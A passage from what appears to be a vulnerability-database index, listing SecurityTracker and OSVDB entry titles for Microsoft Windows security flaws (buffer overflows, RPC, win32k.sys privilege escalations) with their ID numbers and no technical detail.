Users Execute Arbitrary Code and Local User Gain Elevated Privileges [1015036] Microsoft Windows FTP Client Input Validation Hole Lets Remote Servers Create/Overwrite Files on the Target User's System [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014642] Microsoft Windows Kerberos and PKINIT Vulnerabilities Allow Denial of Service, Information Disclosure, and Spoofing [1014640] Microsoft Windows Plug and Play Stack Overflow Lets Remote Users Execute Arbitrary Code [1014639] Microsoft Windows Telephony Service Remote Code Execution or Local Privilege Escalation [1014638] Microsoft Windows Print Spooler Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014498] Microsoft Windows Remote Desktop Protocol Bug Lets Remote Users Deny Service [1014198] Microsoft Windows Buffer Overflow in Processing Server Message Block Packets Lets Remote Users Execute Arbitrary Code [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013689] Microsoft Windows Shell MSHTA Lets Remote Users Code Execute Arbitrary Scripting Code [1013688] Microsoft Windows Kernel and Font Buffer Overflows Let Local Users Deny Service or Obtain System Privileges [1013686] Microsoft Windows TCP, IP, and ICMP Processing Errors Let Remote Users Deny Service and Execute Arbitrary Code [1013552] Microsoft Windows Remote Desktop 'TSShutdn.exe' Lets Remote Authenticated Users Shutdown the System [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1013120] Microsoft Windows OLE Buffer Overflow Lets Remote Users Execute Arbitrary Code and COM Access Flaw Lets Remote Authenticated Users Gain Elevated Privileges [1013119] Microsoft Windows Hyperlink Object Library Lets Remote Users Execute Arbitrary Code [1013117] Microsoft Windows License Logging Service Lets Remote Users Execute Arbitrary Code [1013115] Microsoft Windows Media Player Buffer Overflow in Processing PNG Files Lets Remote Users Execute Arbitrary Code [1013114] Microsoft Windows SMB Lets Remote Users Execute Arbitrary Code [1013112] Microsoft Windows XP Named Pipe Validation Error Lets Remote Users Obtain Information [1012891] Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag [1012684] Microsoft Windows LoadImage API Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012683] Microsoft Windows ANI File Parsing Errors Let Remote Users Deny Service [1012682] Microsoft Windows Help System Buffer Overflows in Processing Phrase Compressed Help Files Lets Remote Users Execute Arbitrary Code [1012626] Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code [1012515] Microsoft Windows NT 4.0 Buffer Overflows in the Logging and Processing of DHCP Packets May Let Remote Users Execute Arbitrary Code [1012513] Microsoft Windows Kernel Buffer Overflow in Processing Local Procedure Call Messages Lets Local Users Gain System Privileges [1012458] Microsoft Internet Explorer Lets Remote Users Inject Content into Open Windows [1012435] Microsoft Windows Resource Kit Buffer Overflow and Input Validation Holes in 'w3who.dll' May Permit Remote Code Execution and Cross-Site Scripting Attacks [1011940] Microsoft Remote Desktop on Windows XP Lets Remote Authenticated Users Restart the System [1011880] Microsoft Windows XP Error in Explorer in Processing WAV Files Lets Remote Users Deny Service [1011859] Microsoft Internet Explorer on Windows XP Fails to Restrict Drag and Drop Operations When Configured to Disable These Operations [1011647] Microsoft Windows Shell Buffer Overflows Let Remote Users Execute Arbitrary Code [1011637] Microsoft Windows Buffer Overflow in Processing Compressed Folders Lets Remote Users Execute Arbitrary Code [1011632] Microsoft NT RPC Runtime Library Buffer Overflow Lets Remote Users Deny Service [1010996] Microsoft Windows XP SP2 Local Computer Scripting Restrictions Can Be Bypassed With a Specially Crafted MHT File [1010959] Microsoft Windows Explorer (in XP SP2) May Fail to Warn Users When Executing Untrusted Files [1010688] Microsoft Windows Task Scheduler Buffer Overflow Lets Remote Users Execute Arbitrary Code [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010314] Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users [1009940] Microsoft Windows Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009776] Microsoft Windows Kernel Local Descriptor Table Flaw Lets Local Users Gain Elevated Privileges [1009771] Microsoft Windows Negotiate Security Software Provider (SSP) Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1009761] Microsoft Windows COM Object Identifier Creation Flaw May Let Remote Users Cause Applications to Open Network Ports [1009758] Microsoft Windows RCP Memory Leak Lets Remote Users Deny Service [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009359] Microsoft Windows Media Services Can Be Crashed By Remote Users [1009181] Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution [1009008] Microsoft Windows Internet Naming Service (WINS) Length Validation Flaw Lets Remote Users Deny Service [1008699] Microsoft Windows Buffer Overflow in MDAC Lets Remote Users Execute Arbitrary Code [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008146] Microsoft Windows Workstation Service (wkssvc.dll) Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Privileges [1007933] Microsoft Windows Messenger Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With Local System Privileges [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007874] Microsoft Windows OS PostThreadMessage() API Permits Local Users to Terminate Processes That Have Message Queues [1007615] Microsoft Windows NetBIOS Name Service May Disclose Memory Contents to Remote Users [1007281] Microsoft Windows NT File Management Flaw May Let Remote Users Crash Certain Applications [1007214] Microsoft Windows XP Shell Buffer Overflow in Processing Folder Display Attributes Permits Remote Code Execution [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1007059] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Has Another Buffer Overflow That Lets Remote Execute Arbitrary Code [1007057] Microsoft Windows Media Player Access Control Flaw Lets Remote Users View, Modify, and Delete Media Library Metadata [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006866] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Lets Remote Execute Arbitrary Code [1006803] Microsoft Windows Can Be Crashed By Remote Users via Malformed NetMeeting URLs [1006588] Microsoft Windows OS Kernel Messaging Buffer Overflow Lets Local Users Gain Full Control of the System [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006532] Microsoft Windows VM Input Validation Flaw in ByteCode Verifier Lets Malicious Java Applets Execute Arbitrary Code [1006447] Microsoft Windows Terminal Services RDP Implementation Does Not Validate Server Identity, Allowing Man-in-the-Middle Attacks [1006323] Microsoft Windows Buffer Overflow in Windows Script Engine JScript.DLL Lets Remote Users Execute Arbitrary Code [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006179] Microsoft Windows Me Help and Support Center URL Handler Overflow Lets Remote Users Execute Arbitrary Code [1006121] Microsoft Windows 'riched20.DLL' Buffer Overflow May Let Remote Users Crash Applications [1006045] Microsoft Windows XP Redirector Buffer Overflow May Let Local Users Gain System Level Privileges [1005986] Microsoft Windows Terminal Server MSGINA.DLL Flaw Lets Remote Authenticated Users Reboot the Server [1005859] Microsoft Windows File Protection Mechanism Weakness in Trusting Code-Signing Certificate Chains Lets Arbitrary Remote Users Sign Code That Will Be Trusted By Windows [1005858] Microsoft Windows File Protection Weakness May Let Local Users Replace Code With Previous Vulnerable Versions Without Detection [1005833] Microsoft Windows XP Shell Buffer Overflow in Processing Audio Files Allows Remote Users to Execute Arbitrary Code [1005799] Microsoft Windows OS Bug in Processing WM_TIMER Messages May Let Local Users Gain Elevated Privileges [1005761] Microsoft Windows XP Wireless LAN Support May Disclose Access Point Information to Remote Users [1005454] Microsoft Windows Media Player for Solaris Uses Unsafe Default Permissions [1005343] Microsoft Windows Help System Bug in Processing Compiled HTML Help Files Lets Remote Users Execute Arbitrary Commands in the Local Computer Security Zone [1005336] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Files to Be Created [1005335] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Code to Be Executed [1005332] Microsoft Windows Help System Buffer Overflow in 'hhctrl.ocx' Lets Remote Users Execute Arbitrary Code [1005256] (Vendor Issues Fix) Microsoft Windows XP Remote Desktop Implementation Bug Lets Remote Users Crash the Operating System [1005242] Microsoft Windows XP Remote Desktop Can Be Crashed By Remote Users Sending a Modified RDP Packet [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1005108] Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them [1005070] Microsoft Internet Explorer (IE) Browser Error Message Processing Allows Remote Users to Execute Arbitrary Code on Certain Windows 98 Platforms [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1005063] Microsoft Windows XP Help and Support Center Hole Lets Remote Users Create URLs That, When Loaded, Will Delete Arbitrary Files on Your System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003764] Microsoft Windows Operating System Shell URL Handler Bug Lets Remote Users Create HTML That Could Cause Arbitrary Code to Be Executed on Another User's System in Certain Situations [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003686] Microsoft Windows SMTP Service Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003633] Microsoft XML Core Services in Microsoft Windows XP Operating System Lets Remote Scripts Access and Send Local Files [1003591] Microsoft Windows Terminal Services May Cause the System's Screen Saver Lockout Mechanism to Fail in Certain Situations [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1003369] PGPfire Personal Firewall for Microsoft Windows Discloses Identifying Information to Remote Users [1003310] Microsoft Windows NT/2000 Authentication Lockout Bug May Record Successful Logins as Failed Login Attempts in Certain Situations [1003308] Microsoft Windows XP Manifest Processing Bug Lets Local Users Corrupt the System and Cause the Boot Process to Fail [1003257] Microsoft Windows XP Upgrade Effectively Removes Patches from Internet Explorer (IE) During Upgrade, Leaving Users Exposed to IE Vulnerabilities [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003221] Microsoft Internet Explorer (IE) Default Configuration Allows HTML-based Scripts to Access Your Windows Clipboard Contents [1003201] Microsoft Windows 95 Backup Utility Has Buffer Overflow That Could Cause Denial of Service Conditions [1003121] Microsoft Windows XP Task Manager Will Not Kill Certain Processes [1003041] Microsoft Windows XP Remote Desktop Client May Disclose Recently Used Account Names to Remote Users [1003028] Microsoft Windows Universal Plug and Play Component Buffer Overflow Gives Remote Users System Level Access to Windows XP and 98/ME Hosts [1003003] Microsoft Windows XP Hot Key Function Lets Physically Local Users Execute Administrator Hot Key Functions in Certain Situations [1002979] Microsoft Windows Explorer Discloses Stored FTP Passwords to Local Users [1002926] Microsoft Windows Operating System File Locking Design May Allow Local Users to Block Group Policy Scripts [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002601] Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users [1002519] TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users [1002418] Counterpane's Password Safe Password Encryption Utility for Microsoft Windows May Disclose Passwords to Local Users in Certain Situations [1002201] Microsoft Windows TCP/IP Stack Vulnerable to a Certain Man-in-the-Middle Denial of Service Attack [1002197] Microsoft Windows NNTP Network News Service Has a Memory Leak That Allows Remote Users to Cause the Server to Crash [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002105] Microsoft SQL Database Server RPC Input Validation Failure Lets Remote Users Crash the Database Service [1002104] Microsoft Exchange Server RPC Input Validation Failure Lets Remote Users Crash the Exchange Service [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001992] Microsoft Windows NT Lets Remote Users Cause Increased Packet Overhead and Increased CPU Resource Consumption [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001603] Microsoft Windows Media Player May Allow Remote Users to Execute Code Contained in Internet Shortcuts and View Files on the Media Player's Host [1001587] Microsoft Word for Windows and for Mac May Run Macros Linked By RTF Documents Without Warning [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001467] Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001360] Microsoft Windows Operating System DLL May Allow Malicious Remote Scripts to Run Code on the User's Host Without the User's Intervention [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords [1001110] A Microsoft German-Language Hotfix for Windows NT 4 Incorrectly Displays Some Security Events as Other Security Events OSVDB - http://www.osvdb.org: [96194] Microsoft Windows Asynchronous RPC Request Handling Remote Code Execution [83796] Microsoft Windows DCOM RPCSS.exe Local Privilege Escalation [69819] Microsoft Windows Netlogon RPC Service Crafted Request Remote DoS [68586] Microsoft Windows LRPC Server LPC Message Handling Local Privilege Escalation [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [67988] Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution [67981] Microsoft Windows RPC Response Processing Remote Memory Corruption [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [59819] Microsoft Windows RPC Session Handle Hijacking Remote Privilege Escalation [54936] Microsoft Windows RPC Marshalling Engine Internal State Manipulation Remote Code Execution [54934] Microsoft Windows Print Spooler Load Library Crafted RPC Message Arbitrary DLL Loading Privilege Escalation [53667] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation [49243] Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution [49060] Microsoft Windows Message Queuing Service RPC Request Handling Remote Code Execution [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [32445] Microsoft Windows Workstation Service NetrWkstaUserEnum RPC Request DoS [30823] Microsoft Windows Print Spooler (spoolsv.exe) RpcGetPrinterData Function DoS [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [26438] Microsoft Windows RPC Mutual Authentication Server Spoofing [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [13414] Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS [13020] Microsoft Windows XP RPC Cache Memory Leak [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11265] Microsoft Windows NT Malformed RPC Packet Error Message Loop DoS (snork) [11159] Microsoft Windows NT Invalid RPC Named Pipe Saturation DoS [10686] Microsoft Windows NT RPC Library Arbitrary Memory Manipulation [7117] Microsoft Windows RPC Locator Remote Overflow [5247] Microsoft Windows DCOM RPC Object Identity Information Disclosure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [5245] Microsoft Windows RPCSS Large Length Field DoS [2670] Microsoft Windows RPC Race Condition DoS [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow [2100] Microsoft Windows RPC DCOM Interface Overflow [1095] Microsoft Windows NT RPC Locator (RPCSS.EXE) CPU Utilization DoS [673] Microsoft Windows NT RPC Endpoint Mapper Malformed Request DoS [408] Microsoft Windows Malformed DCE/RPC SMBwriteX Request DoS [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [96197] Microsoft Windows TCP/IP Stack Crafted ICMPv6 Packet Handling Remote DoS [96195] Microsoft Windows NAT Driver Crafted ICMP Packet Handling Remote Memory Corruption DoS [96193] Microsoft Windows Unicode Scripts Processor (USP10.DLL) Uniscribe Font Parsing Engine Unspecified Memory Corruption [96180] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3196) [96179] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3197) [96178] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3198) [95667] Microsoft Windows XP Wireless Preferred Network List (PNL) Remote Disclosure [95589] Microsoft Windows Mobile Wireless Preferred Network List (PNL) Remote Disclosure [94987] Microsoft Windows Defender Improper Pathname Handling Local Privilege Escalation [94986] Microsoft Windows Media Format Runtime Media File Handling Arbitrary Code Execution [94985] Microsoft Windows DirectShow GIF File Handling Memory Overwrite Arbitrary Code Execution [94966] Microsoft Windows win32k.sys Memory Object Dereference Handling Local Privilege Escalation [94965] Microsoft Windows win32k.sys Memory Object Allocation Handling Local Privilege Escalation [94964] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [94963] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow DoS [94962] Microsoft Windows win32k.sys Memory Object Handling Local Information Disclosure [94961] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [94126] Microsoft Windows Print Spooler Printer Deletion Memory Handling Local Privilege Escalation [94125] Microsoft Windows TCP/IP Driver TCP Connection Crafted Packet Handling Remote Integer Overflow DoS [94124] Microsoft Windows Kernel Page Fault System Call Handling Local Information Disclosure [93539] Microsoft Windows win32k.sys EPATHOBJ::pprFlattenRec / EPATHOBJ::bFlatten Functions Local Privilege Escalation [93320] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [93319] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [93318] Microsoft Windows DirectX Graphics Kernel Subsystem (dxgkrnl.sys) Memory Object Handling Local Privilege Escalation [93317] Microsoft Windows Essentials Windows Writer Crafted URL Handling Arbitrary File Overwrite [93300] Microsoft Windows HTTP Protocol Stack (HTTP.sys) Crafted HTTP Header Handling Infinite Loop Remote DoS [92133] Microsoft Windows NTFS NULL Pointer Dereference Local Privilege Escalation [92132] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1292) [92131] Microsoft Windows win32k.sys Crafted Font File Handling DoS [92130] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1283) [92127] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unspecified Local Memory Corruption [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [92125] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1294) [92124] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1284) [92122] Microsoft Windows Remote Desktop Client ActiveX (mstscax.dll) Use-after-free Arbitrary Code Execution [91696] Microsoft Windows Modern Mail Unspecified Spoofing Weakness [91269] Microsoft Windows 8 TrueType Font (TTF) Handling Unspecified DoS [91195] Microsoft Windows 7 Unspecified ASLR Protection Mechanism Bypass [91194] Microsoft Windows 7 Kernel Unspecified Local Privilege Escalation (pwn2own) [91193] Microsoft Windows 7 Unspecified ASLR / DEP Protection Mechanism Bypass (pwn2own) [91157] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1287) [91156] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1286) [91155] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1285) [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [90236] Microsoft Windows ZwSetInformationProcess() Function Process Priority Handling Local DoS [90166] Microsoft Windows Object Linking and Embedding (OLE) Automation Memory Allocation RTF File Handling Arbitrary Code Execution [90165] Microsoft Windows Win32.sys CSRSS Memory Object Handling Local Privilege Escalation [90164] Microsoft Windows TCP/IP Stack Crafted Connection Termination Packet (TCP PIN WAIT) Handling Remote DoS [90163] Microsoft Windows Memory Object Reference Count Handling Local Privilege Escalation [90162] Microsoft Windows Memory Object Handling Local Privilege Escalation (2013-1279) [90161] Microsoft Windows ApphelpCacheLookupEntry Function Memory Object Handling Local Privilege Escalation [90160] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1277) [90159] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1276) [90158] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1275) [90157] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1274) [90156] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1273) [90155] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1272) [90154] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1271) [90153] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1270) [90152] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1269) [90151] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1268) [90150] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1267) [90149] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1266) [90148] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1265) [90147] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1264) [90146] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1263) [90145] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1262) [90144] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1261) [90143] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1260) [90142] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1259) [90141] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1258) [90140] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1257) [90139] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1256) [90138] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1255) [90137] Microsoft Windows win32k.sys SfnINOUTSTYLECHANGE Function Memory Object Handling Local Privilege Escalation [90136] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1253) [90135] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1252) [90134] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1251) [90133] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1250) [90132] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1249) [90131] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1248) [90130] Microsoft .NET Framework Windows Form Object Creation Callback Function Arbitrary Code Execution [90129] Microsoft Windows NFS Server Read-only Share File Operation Handling Remote DoS [90128] Microsoft Windows Media Content Handling Arbitrary Code Execution [89315] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [89157] Microsoft Windows IPv6 Router Advertisement (RA) Flooding Weakness [88967] Microsoft Windows SSL/TLS Forced Downgrade MitM Weakness [88966] Microsoft Windows win32k.sys Window Broadcast Message Handling Local Privilege Escalation [88963] Microsoft .NET Framework Windows Forms (WinForms) Component System.Drawing.Imaging.EncoderParameters.ConvertToMemory() Method this.param.Length Parameter Multiple Application Handling Heap Buffer Overflow [88956] Microsoft Windows Printer Spooler Service Print Job Handling Memory Corruption [88836] Microsoft Windows Paint BMP Image Parsing Memory Corruption [88575] Microsoft Windows NT NtAcceptConnectPort Spoofed LPC Port Request Arbitrary Process Hijacking Weakness [88320] Microsoft Windows TrueType Font (TTF) Parsing Unspecified Arbitrary Code Execution [88316] Microsoft Windows OpenType Font (OTF) Parsing Unspecified Arbitrary Code Execution [88313] Microsoft Windows KERNEL32.DLL Filename Parsing Memory Corruption Privilege Escalation [88312] Microsoft Windows DirectPlay Office File Handling Heap Overflow [88051] Microsoft Windows Crafted DHCPv6 Message Remote DoS [87269] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2553) [87268] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2530) [87260] Microsoft Windows Briefcase Handling Underflow (2012-1527) [87259] Microsoft Windows Briefcase Handling Underflow (2012-1528) [86905] Microsoft Windows NTFS ANSI API File Name Truncation Weakness [86903] Microsoft Windows NT CSRSS Malformed Console I/O Local DoS [86866] Microsoft Windows Trusted Publisher Certificate Process Injection UAC Protection Bypass [86865] Microsoft Windows UAC Protection User-assisted Circumvention [86839] Microsoft Windows Media Player AVI File Handling Divide-by-Zero DoS [86768] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Handling Buffer Overflow [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [86060] Microsoft Windows Kerberos Implementation Session Handling Remote DoS [86058] Microsoft Windows Kernel Unspecified Memory Object Handling Local Overflow [85840] Microsoft Windows lpApplicationName Function Path Subversion Local Privilege Escalation [85749] Microsoft Windows win32k.sys TrueType Font File Handling Buffer Overflow [85619] Microsoft Windows Phone 7 X.509 Certificate Subject's Common Name (CN) Field Domain Name Validation Multiple Protocol SSL Server MitM Spoofing Weakness [85444] Microsoft Windows NT MSIEXEC Registry Modification Local Privilege Escalation [85442] Microsoft Windows NT Predictable LPC Message Identifier Weakness [85418] Microsoft Windows Share Service File Handle Request Saturation Remote DoS [85039] Microsoft Windows NT LPC Zone Exhaustion Local DoS [85038] Microsoft Windows Filename Extension Handling Overflow DoS [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84603] Microsoft Windows win32k.sys Use-after-free Local Privilege Escalation [84602] Microsoft Windows Remote Desktop Services Malformed RDP Packet Parsing Remote Code Execution [84601] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Stack Overflow [84600] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Heap Overflow [84599] Microsoft Windows Print Spooler Service Remote Format String [84598] Microsoft 